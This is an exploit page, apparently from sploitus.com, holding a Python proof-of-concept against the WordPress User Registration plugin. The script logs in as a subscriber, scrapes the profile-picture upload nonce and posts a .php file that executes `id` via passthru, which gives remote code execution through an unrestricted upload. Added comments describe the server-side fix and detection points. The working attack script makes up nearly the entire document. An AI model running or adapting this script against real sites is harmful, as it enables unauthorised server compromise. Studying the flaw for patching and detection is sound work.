## https://sploitus.com/exploit?id=WPEX-ID:968C677C-1BEB-459B-8FD1-7F70BCAA4F74
The following Python script automates exploitation of this plugin by uploading a malicious PHP file (tested on a default installation of WordPress 6.1).
---
import io
import random
import re
import string
import requests
# Proof-of-concept flow, as shown by the requests below: log in with an
# ordinary (subscriber-level) account, pull an upload nonce out of the
# post-login page, then POST a .php file to an admin-ajax.php action.
# From a defender's view the chain needs valid low-privilege credentials
# plus a server side that accepts the client-supplied "valid_extension"
# value; the fix is a server-side allow-list of extensions/MIME types
# that ignores that field, and the upload request is the detection point.
BASE_URL: str = input("Enter the target URL: ")
USERNAME: str = input("Enter the subscriber user: ")
PASSWORD: str = input("Enter the user password: ")
# In-memory "file" body: a PHP snippet that runs `id` via passthru, i.e. a
# minimal command-execution probe rather than a full shell.
PAYLOAD = io.StringIO("""\
<?php passthru('id');
""")
# Ten random ASCII letters plus ".php" — the artifact to look for on disk
# under the plugin's profile-picture upload location (exact path not shown
# here; the server's JSON reply reports it, see the final print).
FILENAME: str = "".join(random.choices(string.ascii_letters, k=10)) + ".php"
with requests.Session() as session:
    # Fixed desktop-Chrome User-Agent; the Session keeps the login cookies
    # for the later requests.
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
    })
    # Authenticate as user.
    # The initial GET is done before the POST — presumably to pick up the
    # test cookie WordPress expects at login (not confirmed here).
    session.get(f"{BASE_URL}/wp-login.php")
    response = session.post(f"{BASE_URL}/wp-login.php", data={
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "testcookie": "1"
    })
    # Extract the "user_registration_profile_picture_upload_nonce" nonce
    # The nonce is read from inline JavaScript on the page returned after
    # login, so this only works while the plugin exposes it there.
    # NOTE(review): the substring check is redundant with the regex that
    # follows — both paths exit(1) with the same message.
    if '","user_registration_profile_picture_upload_nonce":"' not in response.text:
        print("[!] Nonce not found :(")
        exit(1)
    match = re.search(r'\"user_registration_profile_picture_upload_nonce\":\"(\w+)\"', response.text)
    if not match:
        print("[!] Nonce not found :(")
        exit(1)
    nonce = match.group(1)
    # Upload the payload
    # A single multipart POST to admin-ajax.php. The "valid_extension"
    # field is chosen by the client; the script's success depends on the
    # server honouring it instead of its own allow-list. Logging/WAF rules
    # that flag this action name with a ".php" filename in the multipart
    # part would catch this request.
    response = session.post(f"{BASE_URL}/wp-admin/admin-ajax.php", data={
        "action": "user_registration_profile_pic_upload",
        "security": nonce,
        "valid_extension": "application/php",
    }, files={"file": (FILENAME, PAYLOAD)})
    # The JSON reply's data.url is where the server says the file landed;
    # this will raise (KeyError/JSONDecodeError) if the upload was rejected.
    print(response.json()["data"]["url"])